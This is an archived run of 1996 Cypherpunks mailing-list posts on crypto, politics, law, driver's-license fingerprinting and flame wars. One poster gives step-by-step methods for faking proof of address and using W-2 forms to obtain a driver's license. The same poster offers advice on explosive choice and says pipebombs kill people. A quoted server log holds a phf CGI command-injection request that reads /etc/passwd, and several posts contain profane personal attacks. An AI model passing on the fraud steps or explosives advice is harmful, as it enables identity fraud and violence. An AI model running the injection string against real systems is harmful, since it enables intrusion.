a BBS) is seeded with a true random > seed (derived possibly from keyboard latency) and used each time a > message is send to create a message length randon string. > > This string is XOR`d or added to the message creating a OTP. > > The recipient has previously been sent a seed value for the generator > encrypted under say RSA and signed to prevent a man in the middle > attack. That's the definition of a stream cipher. BBS is rather slow and is dependant on the difficulty of factoring large numbers. Of course, if the keys are distributed using RSA or Rabin, then the strength of the system depends on the difficulty of factoring numbers anyway. There are many stream ciphers that are fast and secure. I generally like to use a block cipher in CFB or OFB mode rather than a stream cipher, but they are basically the same thing. Mark - -- PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ From asgaard at Cor.sos.sll.se Fri Sep 20 20:57:45 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Sat, 21 Sep 1996 11:57:45 +0800 Subject: Go away CIA In-Reply-To: <199609201646.CAA00999@myinternet.myinternet.net> Message-ID: On Sat, 21 Sep 1996, Skeeve Stevens wrote: > After putting up the CIA hack mirror page on http://www.skeeve.net/cia/ > I learnt a few things. Interesting.
Some background, from Dagens Nyheter (biggest morning paper in Sweden) 09/20/96, by Anna-Maria Hagerfors: (free translation) ************************************************************** They call themselves Mr Big, Zaphod, Lixon, Bah and Nimh. They are Swedish hackers presently prosecuted at the Stockholm (low) court for, among other things, computer intrusion, corporate espionage and fraud. Swedes associated with the group (Swedish Hacker Association) have broken into CIA's homepage on the Internet for protesting against the trial. ... ...telling the Swedish prosecutor: Stop lying, Bo Skarinder! ... Those prosecuted at the Stockholm court are suspected of computer intrusion at Telia (big Swedish telco), Holmens Bruk (big Swedish corporation), KTH (University of Stockholm's engineering division) and AT&T. The oldest of the prosecuted, Mr Big, 29 yo, is believed to be the leader of the Swedish Hacker Association. He's working as a security consultant for a traveler check company and a debt collection service. ... Mr Big has applied for a job at SAPO (Swedish FBI) and Forsvarets Radioanstalt (Swedish NSA). ... *************************************************************** Asgaard From whgiii at amaranth.com Fri Sep 20 21:22:18 1996 From: whgiii at amaranth.com (William H. Geiger III) Date: Sat, 21 Sep 1996 12:22:18 +0800 Subject: Fuckhead Message-ID: <199609210227.VAA10007@mailhub.amaranth.com> Congratulations dlv at bwalk.dm.com!!!! You have won a one-way trip into my TWIT filter for your repeated FUCKHEAD post. Goodbye and good riddance, -- ----------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting WebExplorer & Java Enhanced!!! Merlin Beta Test Site - WarpServer SMP Test Site Author of PGPMR2 - PGP Front End for MR/2 Ice Look for MR/2 Tips & Rexx Scripts Get Work Place Shell for Windows!! PGP & MR/2 the only way for secure e-mail.
Finger whgiii at amaranth.com for PGP Key and other info ----------------------------------------------------------- MR/2 Tag->The best way to accelerate Windows is at escape velocity. From nobody at cypherpunks.ca Fri Sep 20 21:32:05 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Sat, 21 Sep 1996 12:32:05 +0800 Subject: Anonymous Oddsman 2 Message-ID: <199609210230.TAA07235@abraham.cs.berkeley.edu> Current English U.S. Presidential betting odds are now offered on 2 services, but there's no Perot bet at Ladbroke House, and no Harry Browne on either. Ladbrokes customer service @ +44 181 8621820 is still at Clinton 1:7, Dole 4:1 As promised, this time our roving reporter inquired about Harry Browne. The Libertarian candidate, once offered at 50:1 by Ladbroke House earlier this year, is not now offered. H. Ross Perot, perhaps reflecting the decision of the debate commission not to invite him, is also not offered at Ladbroke House. The wonderful thing about a free gambling marketplace, though, is that you can always go elsewhere if you want to take a gamble on Ross. The William Hill customer helpline @ +44 990 181715 said Clinton 1:8, Dole 9:2 and for Perot they can give you a whopping 250:1! Also, no odds given on Browne at William Hill, so in summary:

              Ladbroke House        William Hill
------------------------------------------------------------
Clinton       1:7 (no change)       1:8
Dole          4:1 (no change)       9:2
Perot         (was 50:1 now 0)      250:1
Browne        *                     *
------------------------------------------------------------
*Not currently offered.

Next posting when we get around to it, or when the situation seems to have changed substantially. Many thanks to our roving reporter for these numbers. anonymous oddsman.
From attila at primenet.com Fri Sep 20 21:48:25 1996 From: attila at primenet.com (attila) Date: Sat, 21 Sep 1996 12:48:25 +0800 Subject: His Eminence, the Esteemably Dishonourable Dr.Dimitri Vulis KOTM In-Reply-To: Message-ID: <199609210232.UAA25627@InfoWest.COM> Sorry, dear, but complaining isn't going to change it, and simply telling people to shut the fuck up is going to go nowhere. His Eminence, the Esteemably Dishonourable Dr.Dimitri Vulis KOTM: ah, but you, sir, are childish. apparently even reminding you of the threads which bind the human existence into something more than the sweat of the jungle, at least among the "supposedly" educated, is wasted. the concept of the very existence of other inhabitants is a fact which seems to escape your restrained consciousness and cerebral ruminations. your moral fiber must be limited by the vicarious thrill of the predator, a man(?) who neither shows nor grants either compassion or mercy, spewing only banal swill. but, if such unconscious viciousness was to be directed to your greed lined nest, the sounds of a feral swine meeting the abattoir would emanate from the stench. If you want solely crypto relevant material, subscribe to the filtered list. I mean, come on -- you know this list is suseptable (sp?) to noise and spam. this list is alive, but it does not come with persistent scurrilous personal attacks against fellow subscribers. those are added by a few individuals, such as you seem wont to be, whose minds never matriculated to the nursery, forever restrained in their toilet training graduation ritual; the proverbial rotten apple in the barrel. Besides, people suggest to me that you are the anonymous mailer. So maybe you should keep a low profile on this. I never have need to post criticism or sarcasm anonymously. I would prefer to do so face to face --standing on your toes. --attila, just attila, Mr. Nobody... -- Lady: "Sir Winston! You are appallingly drunk!"
Churchill: "lady, you are ugly; but I shall be sober in the morning." From ericm at lne.com Fri Sep 20 22:03:03 1996 From: ericm at lne.com (Eric Murray) Date: Sat, 21 Sep 1996 13:03:03 +0800 Subject: How's the list? In-Reply-To: Message-ID: <199609210245.TAA22366@slack.lne.com> Phil Fraering writes: > > > I thought I'd ask how the list is going... it seems to have gone > downhill; there are now totally gratuitous insults to tcmay that > don't seem to serve any purpose besides making sure the archive > (if there is one) isn't fit for family viewing. Mail filters are now virtually mandatory for reading cypherpunks. > * I take it SSL still hasn't been strengthened? SSLv3 has no known weaknesses, other than the government-mandated ones. Of course there's always new ideas in breaking crypto protocols, or new people working on it. > * I'm now working part of the time at a company that has a lot of > mail-order sales; are any of you aware of how much credit card fraud is > going on out there right now? No, how much? > Might some of this actually be from unsecure SSL transactions? Some of it might, however since there's about a zillion ways to steal CC numbers that are even easier than brute-forcing GAKware "export" SSL, I'd guess that the vast majority of CC fraud is from other causes. It's just so easy to go dumpster-diving for credit slips behind Macys, or snoop in on people phone-ordering goods over cellular or "portable" phones. Why bother breaking SSL? Why, that requires a computer! -- Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF From phrabins at eagle.wbm.ca Fri Sep 20 22:48:35 1996 From: phrabins at eagle.wbm.ca (PETER JAMES HRABINSKY) Date: Sat, 21 Sep 1996 13:48:35 +0800 Subject: ? for everyone!!!! Message-ID: <199609210321.VAA07927@eagle.wbm.ca> Does anyone have a simple password.cgi script for HTML authorization/access? If so, please send it to me...
Thank you for your time... Peter From declan at well.com Fri Sep 20 22:53:41 1996 From: declan at well.com (Declan McCullagh) Date: Sat, 21 Sep 1996 13:53:41 +0800 Subject: FCC's Hundt calls for univ service for Net, nixes iphone regs Message-ID: To the FCC's Reed Hundt, the Internet community is "governmentally challenged." But then, the commission's chairman honestly believes that FCC stands for "Friendly to Computer Communications." Yeah, right. That's what he said in a speech this week. The FCC faxed it to me today after I returned from a Cato Institute conference -- where, ironically enough, we spent a day talking about private ordering of the Net. The concept makes a kind of intrinsic sense to me: who needs government subsidies for Net connections when an account is just $10/month? The first half of the fax was mangled, thanks to the FCC's anything-but-high-tech communications technology, so I shoved it in my pocket and went for pizza with folks from the conference -- Eugene Volokh, Charles Platt, Duncan Frissel, Alan Lewine, Solveig Bernstein, and Brian LaMacchia. We chatted -- surprise! -- about the Feds' future Net-regulation attempts. When I got home and unfolded the fax, I found I could read the second half. It was horrific. While Hundt did say he'd keep the FCC's hands off of Net-telephony, he called for universal service for the Net. Universal service is bad, from an economic perspective, for the same reason that any subsidy scheme is bad: you're taking money out of one part of the economy and pushing it into another. It's also vulnerable to DC lobbyists in tasseled cordovan loafers descending on Capitol Hill calling for more cash. Hundt's scheme is more damming than it looks at first. In his speech, Hundt calls for reconsidering how the FCC will "vote next year on a new universal service funding mechanism." This slush fund isn't funded from general taxpayer revenues. 
The 1996 Telecom dereg act directs the FCC to rework the payment mechanism that feeds the universal service fund that all phone service providers must pay into. It does things like make urban customers pay more to subsidize rural telephone service. Companies that are eligible for subsidies suck cash from the fund -- and of course lobby for more along the way. Now Hundt seems to want to wire schools from this fund. (And what else? He doesn't quite say.) To replace the money from the account, the FCC has to grab more from phone companies, which means higher phone bills. Does this make sense or what? -Declan (PS: Note Hundt's email address is rhundt at fcc.gov.) ********* (Keystroked by declan at well.com) Reed Hundt speech excerpts: "My hope is that the power of the Internet will forcedrive our two-point FCC agenda -- competition in communications and public benefits from communications. That's why we've resisted all efforts to bring Internet communication within the out of date regulatory scheme we have inherited at the FCC. "The challenge now is for the govenmentally challenged Internet community to figure out how to talk to the FCC on this subject and what to say? After all, FCC stands for Friendly to Computer Communications. After all I'm the first FCC chairman ever to be on the Net -- so let me know -- rhundt at fcc.gov. What should our policies for bandwidth growth look like? "Now I'd like to move on to the second aspect of Hundt's Law, which is that everyone needs access to the Internet, either at home, at school, or in a library. Metcalfe's Law only applies when people can access the network, and if they know how to take advantage of the network access that is available to them... So even if we are successful in meeting the bandwidth challenge, we must still ensure that there is access. [...] "The investment to network our schools and libraries is so small and the payoff so large. Look at the math... 
Can it be that we have a 700 billion-dollar-a-year information technology industry and yet we can't afford to give every teacher the tools we give every shipping clerk at Wal Mart? Or that we could afford to network every classroom by the beginning of the next century, but somehow we just neglected to do it? At the FCC we will vote next year on a new universal service funding mechanism... The challenge I'm talking about is to provide bandwidth and access to all Americans, but especially in kids in classrooms... [Note that the 'we" paying for the shipping clerk's network is a private corporation spending its own money. But the second "we" is the government spending netizens' money. Guess the FCC can't tell the difference. --Declan] ### From unicorn at schloss.li Sat Sep 21 01:21:28 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 21 Sep 1996 16:21:28 +0800 Subject: Insider Trading - news report In-Reply-To: <01I9O2JCWXMK8Y4ZFQ@mbcl.rutgers.edu> Message-ID: On Thu, 19 Sep 1996, E. Allen Smith wrote: > I'd be curious as to the comments of Black Unicorn and others on > that legal finding - it does appear to make things at least a bit better > in this area... including making it difficult to claim that insider > information shouldn't be transmitted on the Net. Incidentally, I find > AP's calling insider trading "fraud" rather biased. > -Allen > > > _________________________________________________________________ > > Direct Media > > _________________________________________________________________ > > INSIDER TRADING NEVER WENT AWAY > > __________________________________________________________________________ > > Copyright © 1996 Nando.net > > Copyright © 1996 The Associated Press > > > WASHINGTON (Sep 18, 1996 10:35 a.m. EDT) -- One of the most infamous > > acts in the financial fraudster's playbook, insider trading, remains > > at record levels, despite a decade of steady crackdowns by regulators. 
This is a classic effect of a black market economy for which there is great demand, i.e., that regulation can only change the rules, not stop the conduct. > > [...] > > > The SEC brought one of its more unusual insider trading cases on > > Monday, when it sued the unnamed account holders in a Swiss and > > Bahamian accounts with insider trading ahead of The Gillette Co.'s > > merger proposal for Duracell International. I'm not sure why this is unusual. This is all the SEC can do when there are secret accounts used. Prediction: The holders of the Swiss accounts will be before a grand jury in 9 months or less. The holders of Bahamian accounts, should they be distinct from the former group, will never be found. (Switzerland shares information with the United States in cases like this with alarming frequency, and often Swiss banks get waivers from clients who wish to trade with Swiss accounts. These waivers release the bank from liability for cooperating with investigations involving such trades. > [...] > > > One disturbing development for regulators is a recent decision by the > > 8th U.S. Circuit Court of Appeals that struck down one of the SEC's > > main enforcement tools in insider trading cases. > > > The court, which covers several Midwestern states, rejected the > > so-called "misappropriation theory" in insider trading cases, which is > > used to nab people trading on inside information who don't owe a > > fiduciary duty to the company's shareholders. The court also rejected > > an SEC rule used to snare insider trading in tender offers. I'm pleased at this decision. Misappropriation theory was designed by creative prosecutors to solve a specific problem. i.e., if Joe, employee of Company X, tells Dave about an impending merger which Dave then trades on, what fraud has Dave committed and against whom? Dave is not an "Insider" of company X, and thus had no strict Duty to the company. 
As prosecutions relied on sections 10-b and 10-b(5) of the Securities Exchange Act of 1934, they were required to show fraud to make their case. "It shall be unlawful for any person, directly or indirectly, by any means or instrumentality of interstate commerce, or of the mails, or of any facility of any national securities exchange, (1) to employ any device, scheme, or artifice to defraud, [...] (3) to engage in any act, practice, or course of business which operates or would operate as a fraud or deceit upon any person, in connection with the purchase or sale of any security." (Rule 10b-5) The misappropriation theory was largely intended to extend the reach of courts to cover individuals who do not fall within the traditionally prosecuted areas (the insider and the tippee [he who gets the tip] were always the easiest to nail). Consider the comments of Professor Barbara Aldave (a regular commentator on insider trading): "Without the aid of the misappropriation theory, section 10(b) and rule 10b-5 would lose much of their efficacy as weapons against insider trading on nonpublic information since they would no longer extend to trading by 'outsiders.'" The theory which founded insider trading law before the dawn of misappropriation was the so-called "disclose or abstain" rule. i.e., if you had material nonpublic information by reason of your employment you had a choice. You could disclose that information and then trade on it, or abstain from trading. (Chiarella and Dirks established this line of thinking) Again, courts have been forced to use the concept of fraud in connection with "the purchase or sale of securities" to find liability. When judges saw what they considered illegal behavior by outsiders, the misappropriation theory (that the information had been misappropriated and that therefore the fraud needed to find liability could be found as between the outside trader and the company) provided an easy out for liability.
It was, in my view, a stretch to begin with. See Generally, Barbara Bader Aldave, The Misappropriation Theory: Carpenter and Its Aftermath, 49 Ohio St. L. J. 373 (1988). > > The 8th Circuit decision came in August in a Justice Department case > > against Minneapolis attorney James H. O'Hagan, who was charged with > > insider trading during the 1988 takeover bid of Pillsbury Co. by Grand > > Metropolitan PLC. SEC General Counsel Richard Walker has asked the > > appeals court for a rehearing on the matter. > > > While the 8th Circuit decision represents a setback for the SEC, the > > agency usually brings its cases in the New York and Chicago areas, > > where the federal courts acknowledge these insider trading rules. What is not mentioned here is that the 4th Circuit recently made a similar decision. > > Regulators say these enforcement tools are important because insider > > trading follows few patterns. In an analysis of 35 cases brought in > > 1995 that solely dealt with insider trading, Gerlach said 20 involved > > trading ahead of mergers, three ahead of other positive corporate > > announcements and six ahead of bad corporate news. Who cares if there's a pattern? Notice no one here has bothered to try and make the argument that insider trading harms anyone. Now that the 8th and the 4th Circuits are in conflict with the remainder it is likely that we will soon see a Supreme Court case on the topic. It should be noted that in one of the decisions, (I can't recall which at the moment) the insider trading charges were dismissed, but related wire and mail fraud charges stood. Wire and mail fraud have always, in my view, represented a superior means to prosecute insider trading because they force the prosecution to point to fraud with much more clarity than modern 10b and 10b-5 theory required.
-- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From unicorn at schloss.li Sat Sep 21 01:40:15 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 21 Sep 1996 16:40:15 +0800 Subject: DL in exchange for fingerprint In-Reply-To: Message-ID: On Thu, 19 Sep 1996, Timothy C. May wrote: > At 9:13 PM 9/19/96, Gary Howland wrote: > >Timothy C. May wrote: > >> > >> (Yes, I disliked being thumb-printed, but I could see no viable > >> alternative. I'm sure Duncan has some scheme to declare himself a Botswanan > >> exchange student, but I decided being thumb-printed was the lesser hassle.) > > > >Sure, it's always less hassle doing what they want. Privacy doesn't > >come for free. It's easier to let the police search you in the street > >than it is to make them arrest you so that you can make a formal > >complaint. > > So, just what it is _your_ method of dealing with this? While it is noble > to talk about fighting the system, just how do you go about doing it > yourself? Forum shopping. Not that I would encourage you to break the law, but this method appears to work quite well. Get P.O. Box in state which issues DL's on the spot w/o fingerprinting. Write yourself a letter in very light pencil to this P.O. box. Get postmarked letter and erase the address. Replace address with address of local sports stadium or empty lot in pen complete with return address. This letter is often accepted as proof of address and residence. Use the rest of your documents as normal to obtain driver's license in the state of your choice. > Do you simply drive without a valid driver's license? I know some folks who > do, of course, but it's not something that's "worth it" to me. Some jurisdictions (D.C. is a good example) are such a joke it's not funny. An associate of mine literally MADE his own Italian Driver's license and turned it in, took an eye test, and walked out with a nice new D.C. license. Who the hell knows what an italian license looks like? 
> (This space reserved for your lecture about how I need to be prepared to go > to jail to defend my right not to be thumbprinted, etc. On second thought, > why don't you be the one to go to jail, and then you can let us know your > experiences.) I was once standing in line at a DMV where some schmuck was clearly trying to work his way past the "guardian" with bogus documents. They just shook their head, despite his repeated protests. No one has the time to muck around with cops in there. Even if they did, you are just getting a license with a bogus address, not a bogus name or anything. It's a pretty hard case to make. Point being that it does require effort, but it also pays off. (For seven years in the right jurisdictions). [...] > --Tim May > > We got computers, we're tapping phone lines, I know that that ain't allowed. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^1,257,787-1 | black markets, collapse of governments. > "National borders aren't even speed bumps on the information superhighway." > > > > > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From unicorn at schloss.li Sat Sep 21 01:44:18 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 21 Sep 1996 16:44:18 +0800 Subject: HipCrime as MetaSPAM In-Reply-To: <199609200603.XAA01570@dns1.noc.best.net> Message-ID: On Thu, 19 Sep 1996, James A. Donald wrote: > At 02:10 AM 9/15/96 -0700, Bill Stewart wrote: > >5) "Anarchist Info" - sigh. Where do people get the idea that publishing > >recipes for drugs and explosives is anarchist info? He didn't talk > >about anarchy, or getting along without governments, or getting rid of them. 
> >Also, he neglects to note that you can simply _buy_ potassium chlorate, > >rather than having to (dangerously) boil down bleach and potassium chloride > > > In addition: Potassium chlorate based explosives are not particularly > safe or reliable, but worse than that, much worse, because of their > relatively slow detonation rate, they are very ineffectual for smashing > stuff and killing people, Potassium chlorate makes a very shock sensitive explosive. Use potassium permaganate instead. Pipebombs are not much good for smashing stuff, but they do kill people. (They deflagrate, not detonate, BTW) > --------------------------------------------------------------------- > | > We have the right to defend ourselves | http://www.jim.com/jamesd/ > and our property, because of the kind | > of animals that we are. True law | James A. Donald > derives from this right, not from the | > arbitrary power of the state. | jamesd at echeque.com > > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From unicorn at schloss.li Sat Sep 21 01:49:17 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 21 Sep 1996 16:49:17 +0800 Subject: DL in exchange for fingerprint In-Reply-To: <199609201528.KAA13170@apdg.com> Message-ID: On Fri, 20 Sep 1996, Kurt Vile wrote: > > >By the way, the next rev of the California driver's license will > >reportedly have one's *Social Security Number* printed on the card! > >So much for the statement clearly printed on my card: > > Illinois already has such a law, in fact you must have an SSN to > even get a DL. False. You must present a SSN card or a "suitable substitute." A w2 form with a (not necessarily YOUR) SSN is sufficent. Note that not all w2's actually HAVE your SSN because in some cases the Taxpayer Identification number is distinct from the SSN. I might add that standard w2 forms are available about anywhere. They are also generally filled out by typewriter. 
-- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From drose at AZStarNet.com Sat Sep 21 02:04:12 1996 From: drose at AZStarNet.com (David M. Rose) Date: Sat, 21 Sep 1996 17:04:12 +0800 Subject: FCC's Hundt calls for univ service for Net, nixes iphone regs Message-ID: <199609210704.AAA07745@web.azstarnet.com> On Fri, 20 Sep 1996, Declan McCullagh wrote: (in quoting Reed Hundt) >"The investment to network our schools and libraries is so small and >the payoff so large. Look at the math... Can it be that we have a 700 >billion-dollar-a-year information technology industry and yet we can't >afford to give every teacher the tools we give every shipping clerk at >Wal Mart? Or that we could afford to network every classroom by the >beginning of the next century, but somehow we just neglected to do it? >At the FCC we will vote next year on a new universal service funding >mechanism... The challenge I'm talking about is to provide bandwidth >and access to all Americans, but especially in kids in classrooms... > >[Note that the 'we" paying for the shipping clerk's network is a >private corporation spending its own money. But the second "we" is the >government spending netizens' money. Guess the FCC can't tell the >difference. --Declan] Correct. And if "we" fund universal service, then "we" don't want to see anything on the Net about non-GAK crypto, the right to bear arms, freedom of association, chemistry, non-clothed persons, taxes, etc. etc. "We" feel that many if not "all American, but especially kids in classrooms" would be injured by these thoughts. From jya at pipeline.com Sat Sep 21 04:57:36 1996 From: jya at pipeline.com (John Young) Date: Sat, 21 Sep 1996 19:57:36 +0800 Subject: G48_bul Message-ID: <199609210953.JAA12760@pipe1.ny3.usa.pipeline.com> CIAC has issued Bulletin G-48 on the denial-of-service attacks by TCP SYN flooding and IP spoofing. 
Two "underground magazines" for intruders have recently published code to conduct denial-of-service attacks by creating TCP "half open" connections. Any system connected to the Internet and providing TCP-based network services such as a Web server, FTP server, or mail server is potentially subject to this attack. Systems providing TCP-based services to the Internet community may be unable to provide those services while under attack and for some time after the attack ceases. See the bulletin below for information on how to protect your site from these attacks. ----- http://jya.com/g48bul.txt (15 kb) G48_bul From tcmay at got.net Sat Sep 21 05:50:42 1996 From: tcmay at got.net (Timothy C. May) Date: Sat, 21 Sep 1996 20:50:42 +0800 Subject: FCC's Hundt calls for univ service for Net, nixes iphone regs Message-ID: At 7:04 AM 9/21/96, David M. Rose wrote: >On Fri, 20 Sep 1996, Declan McCullagh wrote: >>[Note that the 'we" paying for the shipping clerk's network is a >>private corporation spending its own money. But the second "we" is the >>government spending netizens' money. Guess the FCC can't tell the >>difference. --Declan] > >Correct. And if "we" fund universal service, then "we" don't want to see >anything on the Net about non-GAK crypto, the right to bear arms, freedom of >association, chemistry, non-clothed persons, taxes, etc. etc. "We" feel >that many if not "all American, but especially kids in classrooms" would be >injured by these thoughts. This is a terribly important point. If the "universal access" scheme is approved and deployed, it gets the government back into the regulation of the Net business. (I'm speaking of the "regulation of the Net" of the sort that existed some years back, when "appropriate use" (scientific, technical, educational, etc.) was the watchword, and casual chatter, GIFs, etc. were called "inappropriate" by some. 
The Constitutional issues of free speech would remain mostly unchanged even if "universal access" happens, but the government would definitely get more of a foot in the door than it has now. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From dlv at bwalk.dm.com Sat Sep 21 07:16:36 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 22:16:36 +0800 Subject: DL in exchange for fingerprint In-Reply-To: Message-ID: Black Unicorn writes: > > Do you simply drive without a valid driver's license? I know some folks who > > do, of course, but it's not something that's "worth it" to me. > > Some jurisdictions (D.C. is a good example) are such a joke it's not > funny. An associate of mine literally MADE his own Italian Driver's > license and turned it in, took an eye test, and walked out with a nice new > D.C. license. In NYC a very high percentage of drivers don't have licences, have suspended licences, etc. Generally no one has the time to bother with them unless they want to nail them for something else. A couple of years ago we were involved in a minor car accident with a Chassidic Jew who tried to leave the scene of the accident. My wife chased him and stopped him. :-) The cops came and discovered that he had no papers (including no driver's licence, no insurance, etc). They gave him about $500 worth of tickets for driving without a licence, leaving the scene of an accident, etc (which I rather doubt he was planning to pay) and let him drive on (still without the licence). 
--- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Sat Sep 21 07:34:41 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 22:34:41 +0800 Subject: Fuckhead In-Reply-To: <199609210227.VAA10007@mailhub.amaranth.com> Message-ID: "William H. Geiger III" writes: > Congratulations dlv at bwalk.dm.com!!!! > > You have won a one-way trip into my TWIT filter for your repeated FUCKHEAD post. ^^^^ You are confused. The 'fuckhead' posts (quoting my entire wire clippings and adding the word 'fuckhead' at the end) are not mine. They are sent to me by Timmy May's friends. I just forward them to this mailing list. I believe they're at least as relevant as Timmy May's political rants. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From runnerfx at octet.com Sat Sep 21 09:25:04 1996 From: runnerfx at octet.com (Wearen Life) Date: Sun, 22 Sep 1996 00:25:04 +0800 Subject: Go away CIA In-Reply-To: <199609201646.CAA00999@myinternet.myinternet.net> Message-ID: I won't be surprised if they were ALSO watching who was visiting your page. I think now is the time to start looking in your hard drive or floppy disk for anything that may incrimanate you. (did I spell that right)? tah ta /*---------/* Wearen Life www.octet.com/~runnerfx Job: Wish I had one Home: Cyber Space Work: Refer to "Job" On Sat, 21 Sep 1996, Skeeve Stevens wrote: > > > Well well... > > After putting up the CIA hack mirror page on http://www.skeeve.net/cia/ > I learnt a few things. > > o it got 50,000 hits in 1 day > o everyone from the cia, senate, fbi, nsa (ncsc) and every other bloody US gov > department looked at it masses of times. The CIA looked at it every 10-15 > minutes. > zztop{root}:15: cat skeeve.net-access_log | grep ucia.gov | wc -l > 281 > > o Even the CIA tries to hack you.
> > relay1-ext.ucia.gov unknown - [21/Sep/1996:01:56:44 +1000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 1180 > > o Dozens of in.fingerd/in.telnetd attempts from ucia.gov, some mil sites and > ncsc.mil sites. > > as I speak the house are looking at it. > b252-209.house.gov unknown - [21/Sep/1996:02:41:37 +1000] "GET /cia/ > > > I "PRESUME" there are no laws (international or otherwise) being broken by > my housing of the mirror... not like I actually care.. but it would be good > to know. > > Ok... ive been up all night chuckling at all the different sort of sites hitting > the mirror... time to sleep. > > > -------------------------------------------------------------------- > Skeeve Stevens Email: skeeve at skeeve.net > CEO/The Big Boss/All round nice guy URL: http://www.skeeve.net/ > MyInternet Australian Anglicans Online > http://www.myinternet.net/ http://www.anglican.asn.au/ > Phone: (+612) 869-3334 Mobile: (0414) SKEEVE [+61414-753-383] > Key fingerprint = D2 7E 91 53 19 FE D0 5C DE 34 EA AF 7A 5C 4D 3E > From joelm at eskimo.com Sat Sep 21 11:04:27 1996 From: joelm at eskimo.com (Joel McNamara) Date: Sun, 22 Sep 1996 02:04:27 +0800 Subject: Private Idaho 2.8b beta release Message-ID: <3.0b19.32.19960921074732.00b95ad0@mail.eskimo.com> The beta release of Private Idaho 2.8b is now available at http://www.eskimo.com/~joelm/pi.html. (Previous beta testers can get an updated version of just the executable at http://www.eskimo.com/~joelm/pi_list.html) Private Idaho is a freeware PGP, anonymous remailer, and nym server front-end for Windows (all versions). 
Some of the new features in the latest release include:
------------------
Automatic encrypt/decrypt of PIDAHO.INI, NYMS.TXT, PUBKEYS.OUT
Automatic encrypt/decrypt of SECRING.PGP and PUBRING.PGP
nym.alias.net support
Generate key pair command
Load passphrase at startup
Submit key to MIT server command
Get key from MIT server command (must have Net connection)
Update remailer info command (must have Net connection)
Get remailer keys command (must have Net connection)
Remailer newsgroup header command
Delete nym command
Attachment support

Bug reports, comments, and questions, as always to: joelm at eskimo.com From jimbell at pacifier.com Sat Sep 21 12:00:31 1996 From: jimbell at pacifier.com (jim bell) Date: Sun, 22 Sep 1996 03:00:31 +0800 Subject: Free RSA chip Message-ID: <199609211655.JAA21400@mail.pacifier.com> At 01:04 PM 9/16/96 -0700, Lucky Green wrote: >I secured a 30 page data sheet for the new NTT (actually NLC, a subsidiary >of NTT) RSA accelerator chips. The NLC0048 LSI chip can handle keys up to >1024 bits. The secret key can be stored on-chip. If you want a copy of the >data sheet, email me your fax number. > >Furthermore, I have *one* sample chip that I am willing to loan to >somebody in the SF Bay Area with sufficient hardware knowledge to put the >chip to good use. If you think you qualify, let me know who you are and >why you think that you should get the chip. I apologize in advance to the >qualified candidates that do not get the chip. There is only one (that I >can loan out). I don't want the chip, but I'd like to know a few things.
1. How much of a secure telephone does it contain?
a. voice A/D/A?
b. modem A/D/A DSP?
c. Keyboard multiplex?
d. control microprocessor?
e. Encryption section?
2. Is there any indication that NT+T has worked with any other manufacturers to design some sort of inter-telephone negotiation standard, one that would allow the kind of inter-compatibility that modems have today?
Jim Bell jimbell at pacifier.com From jimbell at pacifier.com Sat Sep 21 12:05:52 1996 From: jimbell at pacifier.com (jim bell) Date: Sun, 22 Sep 1996 03:05:52 +0800 Subject: IBM_gak Message-ID: <199609211655.JAA21426@mail.pacifier.com> At 09:17 AM 9/16/96 -0700, Lucky Green wrote: >On Mon, 16 Sep 1996, John Young wrote: >> 9-15-96. PcWe: >> "IBM Boosts Encryption Initiative " >> >> IBM security initiatives next month will include a >> new way to build encryption into software and >> technology that could enable U.S. companies to export >> products with strong encryption algorithms. IBM also >> will introduce several "key-recovery" technologies >> that could enable businesses to satisfy the >> requirement imposed by the U.S. government that it be >> able to access encrypted data on demand. > >Aparently, Al Gore's recent phone calls to everybody who is anybody in the >industry have paid off. After HP, TIS, and other unnamed parties, now IBM >is supporting GAK. Folks, this battle is lost. Domestic GAK is coming to >a PKI near you. So, the "Little Tramp" and the "Great Dictator" turn out to be one and the same... Jim Bell jimbell at pacifier.com From dthorn at gte.net Sat Sep 21 12:10:22 1996 From: dthorn at gte.net (Dale Thorn) Date: Sun, 22 Sep 1996 03:10:22 +0800 Subject: anonymous bacon In-Reply-To: <199609201506.JAA03295@atd.atd.ucar.EDU> Message-ID: <324417C8.6E9E@gte.net> Jonathan Corbet wrote: > The following, from RISKS, deserves redistribution.... > Date: Tue, 17 Sep 1996 13:04:47 -0400 > From: pcw at access.digex.net (Peter Wayner) > Subject: Bringing Home the Anonymous Bacon > The *Baltimore Sun* reports in its 17 Sep 1996 issue that people in > Baltimore are paying for drugs with meat (page A1! [pretty saucy!]). > 